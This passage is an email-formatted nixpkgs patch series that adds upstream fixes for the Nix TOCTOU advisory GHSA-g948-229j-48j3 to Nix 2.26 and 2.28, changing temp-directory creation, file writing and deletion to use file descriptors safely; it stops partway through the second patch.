=?UTF-8?q?J=C3=B6rg=20Thalheim?= Date: Sun, 22 Jun 2025 18:50:46 +0200 Subject: [PATCH 59/73] nix_2_26: add patch for GHSA-g948-229j-48j3 This addresses a TOCTOU (Time-of-Check to Time-of-Use) vulnerability in Nix's build system that could potentially allow privilege escalation or unauthorized file access during the build process. The patch includes: - Safe file operations using file descriptors - Secure temporary directory handling - Safe chown operations - PassAsFile security improvements - Path validation fixes --- pkgs/tools/package-management/nix/default.nix | 1 + .../patches/ghsa-g948-229j-48j3-2.26.patch | 463 ++++++++++++++++++ 2 files changed, 464 insertions(+) create mode 100644 pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.26.patch diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index 839b6e0b3127..0096e514d7b5 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -178,6 +178,7 @@ lib.makeExtensible ( nix_2_26 = commonMeson { version = "2.26.3"; hash = "sha256-5ZV8YqU8mfFmoAMiUEuBqNwk0T3vUR//x1D12BiYCeY="; + patches = [ ./patches/ghsa-g948-229j-48j3-2.26.patch ]; self_attribute_name = "nix_2_26"; }; diff --git a/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.26.patch b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.26.patch new file mode 100644 index 000000000000..985e7b29e53f --- /dev/null +++ b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.26.patch @@ -0,0 +1,463 @@ +From 787e012f26761e1455e711ab4ceedaa2c740621c Mon Sep 17 00:00:00 2001 +From: Eelco Dolstra +Date: Thu, 19 Jun 2025 16:20:34 +0200 +Subject: [PATCH] Fixes for GHSA-g948-229j-48j3 +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Squashed commit of the following: + +commit 04fff3a637d455cbb1d75937a235950e43008db9 +Author: Eelco Dolstra +Date: Thu Jun 12 12:30:32 2025 +0200 + + Chown structured attr files safely + +commit 5417ad445e414c649d0cfc71a05661c7bf8f3ef5 +Author: Eelco Dolstra +Date: Thu Jun 12 12:14:04 2025 +0200 + + Replace 'bool sync' with an enum for clarity + + And drop writeFileAndSync(). + +commit 7ae0141f328d8e8e1094be24665789c05f974ba6 +Author: Eelco Dolstra +Date: Thu Jun 12 11:35:28 2025 +0200 + + Drop guessOrInventPathFromFD() + + No need to do hacky stuff like that when we already know the original path. + +commit 45b05098bd019da7c57cd4227a89bfd0fa65bb08 +Author: Eelco Dolstra +Date: Thu Jun 12 11:15:58 2025 +0200 + + Tweak comment + +commit 0af15b31209d1b7ec8addfae9a1a6b60d8f35848 +Author: Raito Bezarius +Date: Thu Mar 27 12:22:26 2025 +0100 + + libstore: ensure that temporary directory is always 0o000 before deletion + + In the case the deletion fails, we should ensure that the temporary + directory cannot be used for nefarious purposes. + + Change-Id: I498a2dd0999a74195d13642f44a5de1e69d46120 + Signed-off-by: Raito Bezarius + +commit 2c20fa37b15cfa03ac6a1a6a47cdb2ed66c0827e +Author: Raito Bezarius +Date: Wed Mar 26 12:42:55 2025 +0100 + + libutil: ensure that `_deletePath` does NOT use absolute paths with dirfds + + When calling `_deletePath` with a parent file descriptor, `openat` is + made effective by using relative paths to the directory file descriptor. + + To avoid the problem, the signature is changed to resist misuse with an + assert in the prologue of the function. + + Change-Id: I6b3fc766bad2afe54dc27d47d1df3873e188de96 + Signed-off-by: Raito Bezarius + +commit d3c370bbcae48bb825ce19fd0f73bb4eefd2c9ea +Author: Raito Bezarius +Date: Wed Mar 26 01:07:47 2025 +0100 + + libstore: ensure that `passAsFile` is created in the original temp dir + + This ensures that `passAsFile` data is created inside the expected + temporary build directory by `openat()` from the parent directory file + descriptor. + + This avoids a TOCTOU which is part of the attack chain of CVE-????. + + Change-Id: Ie5273446c4a19403088d0389ae8e3f473af8879a + Signed-off-by: Raito Bezarius + +commit 45d3598724f932d024ef6bc2ffb00c1bb90e6018 +Author: Raito Bezarius +Date: Wed Mar 26 01:06:03 2025 +0100 + + libutil: writeFile variant for file descriptors + + `writeFile` lose its `sync` boolean flag to make things simpler. + + A new `writeFileAndSync` function is created and all call sites are + converted to it. + + Change-Id: Ib871a5283a9c047db1e4fe48a241506e4aab9192 + Signed-off-by: Raito Bezarius + +commit 732bd9b98cabf4aaf95a01fd318923de303f9996 +Author: Raito Bezarius +Date: Wed Mar 26 01:05:34 2025 +0100 + + libstore: chown to builder variant for file descriptors + + We use it immediately for the build temporary directory. + + Change-Id: I180193c63a2b98721f5fb8e542c4e39c099bb947 + Signed-off-by: Raito Bezarius + +commit 962c65f8dcd5570dd92c72370a862c7b38942e0d +Author: Raito Bezarius +Date: Wed Mar 26 01:04:59 2025 +0100 + + libstore: open build directory as a dirfd as well + + We now keep around a proper AutoCloseFD around the temporary directory + which we plan to use for openat operations and avoiding the build + directory being swapped out while we are doing something else. + + Change-Id: I18d387b0f123ebf2d20c6405cd47ebadc5505f2a + Signed-off-by: Raito Bezarius + +commit c9b42462b75b5a37ee6564c2b53cff186c8323da +Author: Raito Bezarius +Date: Wed Mar 26 01:04:12 2025 +0100 + + libutil: guess or invent a path from file descriptors + + This is useful for certain error recovery paths (no pun intended) that + does not thread through the original path name. + + Change-Id: I2d800740cb4f9912e64c923120d3f977c58ccb7e + Signed-off-by: Raito Bezarius + +Signed-off-by: Jörg Thalheim +--- + src/libstore/local-store.cc | 6 +-- + .../unix/build/local-derivation-goal.cc | 46 ++++++++++++++---- + .../unix/build/local-derivation-goal.hh | 20 ++++++++ + src/libutil/file-content-address.cc | 2 +- + src/libutil/file-system.cc | 47 +++++++++++-------- + src/libutil/file-system.hh | 14 ++++-- + 6 files changed, 99 insertions(+), 36 deletions(-) + +diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc +index 9a7a941b6..c0c808e0a 100644 +--- a/src/libstore/local-store.cc ++++ b/src/libstore/local-store.cc +@@ -116,7 +116,7 @@ LocalStore::LocalStore( + state->stmts = std::make_unique(); + + /* Create missing state directories if they don't already exist. */ +- createDirs(realStoreDir); ++ createDirs(realStoreDir.get()); + if (readOnly) { + experimentalFeatureSettings.require(Xp::ReadOnlyLocalStore); + } else { +@@ -248,7 +248,7 @@ LocalStore::LocalStore( + else if (curSchema == 0) { /* new store */ + curSchema = nixSchemaVersion; + openDB(*state, true); +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%1%", curSchema), 0666, FsSync::Yes); + } + + else if (curSchema < nixSchemaVersion) { +@@ -299,7 +299,7 @@ LocalStore::LocalStore( + txn.commit(); + } + +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, FsSync::Yes); + + lockFile(globalLock.get(), ltRead, true); + } +diff --git a/src/libstore/unix/build/local-derivation-goal.cc b/src/libstore/unix/build/local-derivation-goal.cc +index 5b9bc0bb0..80309e332 100644 +--- a/src/libstore/unix/build/local-derivation-goal.cc ++++ b/src/libstore/unix/build/local-derivation-goal.cc +@@ -559,7 +559,14 @@ void LocalDerivationGoal::startBuilder() + } else { + tmpDir = topTmpDir; + } +- chownToBuilder(tmpDir); ++ ++ /* The TOCTOU between the previous mkdir call and this open call is unavoidable due to ++ POSIX semantics.*/ ++ tmpDirFd = AutoCloseFD{open(tmpDir.c_str(), O_RDONLY | O_NOFOLLOW | O_DIRECTORY)}; ++ if (!tmpDirFd) ++ throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); ++ ++ chownToBuilder(tmpDirFd.get(), tmpDir); + + for (auto & [outputName, status] : initialOutputs) { + /* Set scratch path we'll actually use during the build. +@@ -1157,9 +1164,7 @@ void LocalDerivationGoal::initTmpDir() + } else { + auto hash = hashString(HashAlgorithm::SHA256, i.first); + std::string fn = ".attr-" + hash.to_string(HashFormat::Nix32, false); +- Path p = tmpDir + "/" + fn; +- writeFile(p, rewriteStrings(i.second, inputRewrites)); +- chownToBuilder(p); ++ writeBuilderFile(fn, rewriteStrings(i.second, inputRewrites)); + env[i.first + "Path"] = tmpDirInSandbox + "/" + fn; + } + } +@@ -1264,11 +1269,9 @@ void LocalDerivationGoal::writeStructuredAttrs() + + auto jsonSh = writeStructuredAttrsShell(json); + +- writeFile(tmpDir + "/.attrs.sh", rewriteStrings(jsonSh, inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.sh"); ++ writeBuilderFile(".attrs.sh", rewriteStrings(jsonSh, inputRewrites)); + env["NIX_ATTRS_SH_FILE"] = tmpDirInSandbox + "/.attrs.sh"; +- writeFile(tmpDir + "/.attrs.json", rewriteStrings(json.dump(), inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.json"); ++ writeBuilderFile(".attrs.json", rewriteStrings(json.dump(), inputRewrites)); + env["NIX_ATTRS_JSON_FILE"] = tmpDirInSandbox + "/.attrs.json"; + } + } +@@ -1779,6 +1782,24 @@ void setupSeccomp() + #endif + } + ++void LocalDerivationGoal::chownToBuilder(int fd, const Path & path) ++{ ++ if (!buildUser) return; ++ if (fchown(fd, buildUser->getUID(), buildUser->getGID()) == -1) ++ throw SysError("cannot change ownership of file '%1%'", path); ++} ++ ++void LocalDerivationGoal::writeBuilderFile( ++ const std::string & name, ++ std::string_view contents) ++{ ++ auto path = std::filesystem::path(tmpDir) / name; ++ AutoCloseFD fd{openat(tmpDirFd.get(), name.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC | O_EXCL | O_NOFOLLOW, 0666)}; ++ if (!fd) ++ throw SysError("creating file %s", path); ++ writeFile(fd, path, contents); ++ chownToBuilder(fd.get(), path); ++} + + void LocalDerivationGoal::runChild() + { +@@ -3038,6 +3059,15 @@ void LocalDerivationGoal::checkOutputs(const std::mapisBuiltin()) { +diff --git a/src/libstore/unix/build/local-derivation-goal.hh b/src/libstore/unix/build/local-derivation-goal.hh +index 1ea247661..74a1e1c50 100644 +--- a/src/libstore/unix/build/local-derivation-goal.hh ++++ b/src/libstore/unix/build/local-derivation-goal.hh +@@ -37,6 +37,11 @@ struct LocalDerivationGoal : public DerivationGoal + */ + Path topTmpDir; + ++ /** ++ * The file descriptor of the temporary directory. ++ */ ++ AutoCloseFD tmpDirFd; ++ + /** + * The path of the temporary directory in the sandbox. + */ +@@ -244,9 +249,24 @@ struct LocalDerivationGoal : public DerivationGoal + + /** + * Make a file owned by the builder. ++ * ++ * SAFETY: this function is prone to TOCTOU as it receives a path and not a descriptor. ++ * It's only safe to call in a child of a directory only visible to the owner. + */ + void chownToBuilder(const Path & path); + ++ /** ++ * Make a file owned by the builder addressed by its file descriptor. ++ */ ++ void chownToBuilder(int fd, const Path & path); ++ ++ /** ++ * Create a file in `tmpDir` owned by the builder. ++ */ ++ void writeBuilderFile( ++ const std::string & name, ++ std::string_view contents); ++ + int getChildStatus() override; + + /** +diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc +index 69301d9c8..2b6839346 100644 +--- a/src/libutil/file-content-address.cc ++++ b/src/libutil/file-content-address.cc +@@ -93,7 +93,7 @@ void restorePath( + { + switch (method) { + case FileSerialisationMethod::Flat: +- writeFile(path, source, 0666, startFsync); ++ writeFile(path, source, 0666, startFsync ? FsSync::Yes : FsSync::No); + break; + case FileSerialisationMethod::NixArchive: + restorePath(path, source, startFsync); +diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc +index 6fe93b63a..b3183f495 100644 +--- a/src/libutil/file-system.cc ++++ b/src/libutil/file-system.cc +@@ -258,7 +258,7 @@ void readFile(const Path & path, Sink & sink) + } + + +-void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) ++void writeFile(const Path & path, std::string_view s, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -268,22 +268,29 @@ void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) + , mode)); + if (!fd) + throw SysError("opening file '%1%'", path); ++ ++ writeFile(fd, path, s, mode, sync); ++ ++ /* Close explicitly to propagate the exceptions. */ ++ fd.close(); ++} ++ ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode, FsSync sync) ++{ ++ assert(fd); + try { + writeFull(fd.get(), s); ++ ++ if (sync == FsSync::Yes) ++ fd.fsync(); ++ + } catch (Error & e) { +- e.addTrace({}, "writing file '%1%'", path); ++ e.addTrace({}, "writing file '%1%'", origPath); + throw; + } +- if (sync) +- fd.fsync(); +- // Explicitly close to make sure exceptions are propagated. +- fd.close(); +- if (sync) +- syncParent(path); + } + +- +-void writeFile(const Path & path, Source & source, mode_t mode, bool sync) ++void writeFile(const Path & path, Source & source, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -307,11 +314,11 @@ void writeFile(const Path & path, Source & source, mode_t mode, bool sync) + e.addTrace({}, "writing file '%1%'", path); + throw; + } +- if (sync) ++ if (sync == FsSync::Yes) + fd.fsync(); + // Explicitly close to make sure exceptions are propagated. + fd.close(); +- if (sync) ++ if (sync == FsSync::Yes) + syncParent(path); + } + +@@ -374,7 +381,8 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + #ifndef _WIN32 + checkInterrupt(); + +- std::string name(baseNameOf(path.native())); ++ std::string name(path.filename()); ++ assert(name != "." && name != ".." && !name.empty()); + + struct stat st; + if (fstatat(parentfd, name.c_str(), &st, +@@ -415,7 +423,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + throw SysError("chmod %1%", path); + } + +- int fd = openat(parentfd, path.c_str(), O_RDONLY); ++ int fd = openat(parentfd, name.c_str(), O_RDONLY | O_DIRECTORY | O_NOFOLLOW); + if (fd == -1) + throw SysError("opening directory %1%", path); + AutoCloseDir dir(fdopendir(fd)); +@@ -427,7 +435,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + checkInterrupt(); + std::string childName = dirent->d_name; + if (childName == "." || childName == "..") continue; +- _deletePath(dirfd(dir.get()), path + "/" + childName, bytesFreed); ++ _deletePath(dirfd(dir.get()), path / childName, bytesFreed); + } + if (errno) throw SysError("reading directory %1%", path); + } +@@ -445,14 +453,13 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + + static void _deletePath(const fs::path & path, uint64_t & bytesFreed) + { +- Path dir = dirOf(path.string()); +- if (dir == "") +- dir = "/"; ++ assert(path.is_absolute()); ++ assert(path.parent_path() != path); + +- AutoCloseFD dirfd = toDescriptor(open(dir.c_str(), O_RDONLY)); ++ AutoCloseFD dirfd = toDescriptor(open(path.parent_path().string().c_str(), O_RDONLY)); + if (!dirfd) { + if (errno == ENOENT) return; +- throw SysError("opening directory '%1%'", path); ++ throw SysError("opening directory %s", path.parent_path()); + } + + _deletePath(dirfd.get(), path, bytesFreed); +diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh +index 204907339..b2db8869e 100644 +--- a/src/libutil/file-system.hh ++++ b/src/libutil/file-system.hh +@@ -194,21 +194,27 @@ std::string readFile(const Path & path); + std::string readFile(const std::filesystem::path & path); + void readFile(const Path & path, Sink & sink); + ++enum struct FsSync { Yes, No }; ++ + /** + * Write a string to a file. + */ +-void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), s, mode, sync); + } + +-void writeFile(const Path & path, Source & source, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), source, mode, sync); + } + ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ + /** + * Flush a path's parent directory to disk. + */ +-- +2.49.0 + From a1eacc0a2ce4a4de3c7fd523ddb26c2d95a01fd1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= Date: Sun, 22 Jun 2025 18:51:23 +0200 Subject: [PATCH 60/73] nix_2_28: add patch for GHSA-g948-229j-48j3 This addresses a TOCTOU (Time-of-Check to Time-of-Use) vulnerability in Nix's build system that could potentially allow privilege escalation or unauthorized file access during the build process. The patch includes: - Safe file operations using file descriptors - Secure temporary directory handling - Safe chown operations - PassAsFile security improvements - Path validation fixes --- pkgs/tools/package-management/nix/default.nix | 1 + .../patches/ghsa-g948-229j-48j3-2.28.patch | 454 ++++++++++++++++++ 2 files changed, 455 insertions(+) create mode 100644 pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.28.patch diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index 0096e514d7b5..97fb2eac30ef 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -185,6 +185,7 @@ lib.makeExtensible ( nix_2_28 = commonMeson { version = "2.28.3"; hash = "sha256-TjZp5ITSUvNRAzNznmkZRQxNRzMLiSAplz4bV2T8cbs="; + patches = [ ./patches/ghsa-g948-229j-48j3-2.28.patch ]; self_attribute_name = "nix_2_28"; }; diff --git a/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.28.patch b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.28.patch new file mode 100644 index 000000000000..7de531128279 --- /dev/null +++ b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.28.patch @@ -0,0 +1,454 @@ +From 24c1aa735a40d3bf5361755fa10ac0e577a55eed Mon Sep 17 00:00:00 2001 +From: Eelco Dolstra +Date: Thu, 19 Jun 2025 16:20:34 +0200 +Subject: [PATCH] Fixes for GHSA-g948-229j-48j3 +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Squashed commit of the following: + +commit 04fff3a637d455cbb1d75937a235950e43008db9 +Author: Eelco Dolstra +Date: Thu Jun 12 12:30:32 2025 +0200 + + Chown structured attr files safely + +commit 5417ad445e414c649d0cfc71a05661c7bf8f3ef5 +Author: Eelco Dolstra +Date: Thu Jun 12 12:14:04 2025 +0200 + + Replace 'bool sync' with an enum for clarity + + And drop writeFileAndSync(). + +commit 7ae0141f328d8e8e1094be24665789c05f974ba6 +Author: Eelco Dolstra +Date: Thu Jun 12 11:35:28 2025 +0200 + + Drop guessOrInventPathFromFD() + + No need to do hacky stuff like that when we already know the original path. + +commit 45b05098bd019da7c57cd4227a89bfd0fa65bb08 +Author: Eelco Dolstra +Date: Thu Jun 12 11:15:58 2025 +0200 + + Tweak comment + +commit 0af15b31209d1b7ec8addfae9a1a6b60d8f35848 +Author: Raito Bezarius +Date: Thu Mar 27 12:22:26 2025 +0100 + + libstore: ensure that temporary directory is always 0o000 before deletion + + In the case the deletion fails, we should ensure that the temporary + directory cannot be used for nefarious purposes. + + Change-Id: I498a2dd0999a74195d13642f44a5de1e69d46120 + Signed-off-by: Raito Bezarius + +commit 2c20fa37b15cfa03ac6a1a6a47cdb2ed66c0827e +Author: Raito Bezarius +Date: Wed Mar 26 12:42:55 2025 +0100 + + libutil: ensure that `_deletePath` does NOT use absolute paths with dirfds + + When calling `_deletePath` with a parent file descriptor, `openat` is + made effective by using relative paths to the directory file descriptor. + + To avoid the problem, the signature is changed to resist misuse with an + assert in the prologue of the function. + + Change-Id: I6b3fc766bad2afe54dc27d47d1df3873e188de96 + Signed-off-by: Raito Bezarius + +commit d3c370bbcae48bb825ce19fd0f73bb4eefd2c9ea +Author: Raito Bezarius +Date: Wed Mar 26 01:07:47 2025 +0100 + + libstore: ensure that `passAsFile` is created in the original temp dir + + This ensures that `passAsFile` data is created inside the expected + temporary build directory by `openat()` from the parent directory file + descriptor. + + This avoids a TOCTOU which is part of the attack chain of CVE-????. + + Change-Id: Ie5273446c4a19403088d0389ae8e3f473af8879a + Signed-off-by: Raito Bezarius + +commit 45d3598724f932d024ef6bc2ffb00c1bb90e6018 +Author: Raito Bezarius +Date: Wed Mar 26 01:06:03 2025 +0100 + + libutil: writeFile variant for file descriptors + + `writeFile` lose its `sync` boolean flag to make things simpler. + + A new `writeFileAndSync` function is created and all call sites are + converted to it. + + Change-Id: Ib871a5283a9c047db1e4fe48a241506e4aab9192 + Signed-off-by: Raito Bezarius + +commit 732bd9b98cabf4aaf95a01fd318923de303f9996 +Author: Raito Bezarius +Date: Wed Mar 26 01:05:34 2025 +0100 + + libstore: chown to builder variant for file descriptors + + We use it immediately for the build temporary directory. + + Change-Id: I180193c63a2b98721f5fb8e542c4e39c099bb947 + Signed-off-by: Raito Bezarius + +commit 962c65f8dcd5570dd92c72370a862c7b38942e0d +Author: Raito Bezarius +Date: Wed Mar 26 01:04:59 2025 +0100 + + libstore: open build directory as a dirfd as well + + We now keep around a proper AutoCloseFD around the temporary directory + which we plan to use for openat operations and avoiding the build + directory being swapped out while we are doing something else. + + Change-Id: I18d387b0f123ebf2d20c6405cd47ebadc5505f2a + Signed-off-by: Raito Bezarius + +commit c9b42462b75b5a37ee6564c2b53cff186c8323da +Author: Raito Bezarius +Date: Wed Mar 26 01:04:12 2025 +0100 + + libutil: guess or invent a path from file descriptors + + This is useful for certain error recovery paths (no pun intended) that + does not thread through the original path name. + + Change-Id: I2d800740cb4f9912e64c923120d3f977c58ccb7e + Signed-off-by: Raito Bezarius + +Signed-off-by: Jörg Thalheim +--- + src/libstore/local-store.cc | 4 +- + .../unix/build/local-derivation-goal.cc | 46 ++++++++++++++---- + .../nix/store/build/local-derivation-goal.hh | 20 ++++++++ + src/libutil/file-content-address.cc | 2 +- + src/libutil/file-system.cc | 47 +++++++++++-------- + src/libutil/include/nix/util/file-system.hh | 14 ++++-- + 6 files changed, 98 insertions(+), 35 deletions(-) + +diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc +index f3bee6953..eddc87ef9 100644 +--- a/src/libstore/local-store.cc ++++ b/src/libstore/local-store.cc +@@ -249,7 +249,7 @@ LocalStore::LocalStore( + else if (curSchema == 0) { /* new store */ + curSchema = nixSchemaVersion; + openDB(*state, true); +- writeFile(schemaPath, fmt("%1%", curSchema), 0666, true); ++ writeFile(schemaPath, fmt("%1%", curSchema), 0666, FsSync::Yes); + } + + else if (curSchema < nixSchemaVersion) { +@@ -300,7 +300,7 @@ LocalStore::LocalStore( + txn.commit(); + } + +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, FsSync::Yes); + + lockFile(globalLock.get(), ltRead, true); + } +diff --git a/src/libstore/unix/build/local-derivation-goal.cc b/src/libstore/unix/build/local-derivation-goal.cc +index 9edb6fb0f..a0442d0b8 100644 +--- a/src/libstore/unix/build/local-derivation-goal.cc ++++ b/src/libstore/unix/build/local-derivation-goal.cc +@@ -567,7 +567,14 @@ void LocalDerivationGoal::startBuilder() + } else { + tmpDir = topTmpDir; + } +- chownToBuilder(tmpDir); ++ ++ /* The TOCTOU between the previous mkdir call and this open call is unavoidable due to ++ POSIX semantics.*/ ++ tmpDirFd = AutoCloseFD{open(tmpDir.c_str(), O_RDONLY | O_NOFOLLOW | O_DIRECTORY)}; ++ if (!tmpDirFd) ++ throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); ++ ++ chownToBuilder(tmpDirFd.get(), tmpDir); + + for (auto & [outputName, status] : initialOutputs) { + /* Set scratch path we'll actually use during the build. +@@ -1159,9 +1166,7 @@ void LocalDerivationGoal::initTmpDir() + } else { + auto hash = hashString(HashAlgorithm::SHA256, i.first); + std::string fn = ".attr-" + hash.to_string(HashFormat::Nix32, false); +- Path p = tmpDir + "/" + fn; +- writeFile(p, rewriteStrings(i.second, inputRewrites)); +- chownToBuilder(p); ++ writeBuilderFile(fn, rewriteStrings(i.second, inputRewrites)); + env[i.first + "Path"] = tmpDirInSandbox + "/" + fn; + } + } +@@ -1266,11 +1271,9 @@ void LocalDerivationGoal::writeStructuredAttrs() + + auto jsonSh = writeStructuredAttrsShell(json); + +- writeFile(tmpDir + "/.attrs.sh", rewriteStrings(jsonSh, inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.sh"); ++ writeBuilderFile(".attrs.sh", rewriteStrings(jsonSh, inputRewrites)); + env["NIX_ATTRS_SH_FILE"] = tmpDirInSandbox + "/.attrs.sh"; +- writeFile(tmpDir + "/.attrs.json", rewriteStrings(json.dump(), inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.json"); ++ writeBuilderFile(".attrs.json", rewriteStrings(json.dump(), inputRewrites)); + env["NIX_ATTRS_JSON_FILE"] = tmpDirInSandbox + "/.attrs.json"; + } + } +@@ -1781,6 +1784,24 @@ void setupSeccomp() + #endif + } + ++void LocalDerivationGoal::chownToBuilder(int fd, const Path & path) ++{ ++ if (!buildUser) return; ++ if (fchown(fd, buildUser->getUID(), buildUser->getGID()) == -1) ++ throw SysError("cannot change ownership of file '%1%'", path); ++} ++ ++void LocalDerivationGoal::writeBuilderFile( ++ const std::string & name, ++ std::string_view contents) ++{ ++ auto path = std::filesystem::path(tmpDir) / name; ++ AutoCloseFD fd{openat(tmpDirFd.get(), name.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC | O_EXCL | O_NOFOLLOW, 0666)}; ++ if (!fd) ++ throw SysError("creating file %s", path); ++ writeFile(fd, path, contents); ++ chownToBuilder(fd.get(), path); ++} + + void LocalDerivationGoal::runChild() + { +@@ -3000,6 +3021,15 @@ void LocalDerivationGoal::checkOutputs(const std::mapisBuiltin()) { +diff --git a/src/libstore/unix/include/nix/store/build/local-derivation-goal.hh b/src/libstore/unix/include/nix/store/build/local-derivation-goal.hh +index 795286a01..fb62e3ca4 100644 +--- a/src/libstore/unix/include/nix/store/build/local-derivation-goal.hh ++++ b/src/libstore/unix/include/nix/store/build/local-derivation-goal.hh +@@ -37,6 +37,11 @@ struct LocalDerivationGoal : public DerivationGoal + */ + Path topTmpDir; + ++ /** ++ * The file descriptor of the temporary directory. ++ */ ++ AutoCloseFD tmpDirFd; ++ + /** + * The path of the temporary directory in the sandbox. + */ +@@ -239,9 +244,24 @@ struct LocalDerivationGoal : public DerivationGoal + + /** + * Make a file owned by the builder. ++ * ++ * SAFETY: this function is prone to TOCTOU as it receives a path and not a descriptor. ++ * It's only safe to call in a child of a directory only visible to the owner. + */ + void chownToBuilder(const Path & path); + ++ /** ++ * Make a file owned by the builder addressed by its file descriptor. ++ */ ++ void chownToBuilder(int fd, const Path & path); ++ ++ /** ++ * Create a file in `tmpDir` owned by the builder. ++ */ ++ void writeBuilderFile( ++ const std::string & name, ++ std::string_view contents); ++ + int getChildStatus() override; + + /** +diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc +index 142bc70d5..d95781691 100644 +--- a/src/libutil/file-content-address.cc ++++ b/src/libutil/file-content-address.cc +@@ -93,7 +93,7 @@ void restorePath( + { + switch (method) { + case FileSerialisationMethod::Flat: +- writeFile(path, source, 0666, startFsync); ++ writeFile(path, source, 0666, startFsync ? FsSync::Yes : FsSync::No); + break; + case FileSerialisationMethod::NixArchive: + restorePath(path, source, startFsync); +diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc +index 9ce3682f1..204a63c4e 100644 +--- a/src/libutil/file-system.cc ++++ b/src/libutil/file-system.cc +@@ -298,7 +298,7 @@ void readFile(const Path & path, Sink & sink) + } + + +-void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) ++void writeFile(const Path & path, std::string_view s, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -308,22 +308,29 @@ void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) + , mode)); + if (!fd) + throw SysError("opening file '%1%'", path); ++ ++ writeFile(fd, path, s, mode, sync); ++ ++ /* Close explicitly to propagate the exceptions. */ ++ fd.close(); ++} ++ ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode, FsSync sync) ++{ ++ assert(fd); + try { + writeFull(fd.get(), s); ++ ++ if (sync == FsSync::Yes) ++ fd.fsync(); ++ + } catch (Error & e) { +- e.addTrace({}, "writing file '%1%'", path); ++ e.addTrace({}, "writing file '%1%'", origPath); + throw; + } +- if (sync) +- fd.fsync(); +- // Explicitly close to make sure exceptions are propagated. +- fd.close(); +- if (sync) +- syncParent(path); + } + +- +-void writeFile(const Path & path, Source & source, mode_t mode, bool sync) ++void writeFile(const Path & path, Source & source, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -347,11 +354,11 @@ void writeFile(const Path & path, Source & source, mode_t mode, bool sync) + e.addTrace({}, "writing file '%1%'", path); + throw; + } +- if (sync) ++ if (sync == FsSync::Yes) + fd.fsync(); + // Explicitly close to make sure exceptions are propagated. + fd.close(); +- if (sync) ++ if (sync == FsSync::Yes) + syncParent(path); + } + +@@ -414,7 +421,8 @@ static void _deletePath(Descriptor 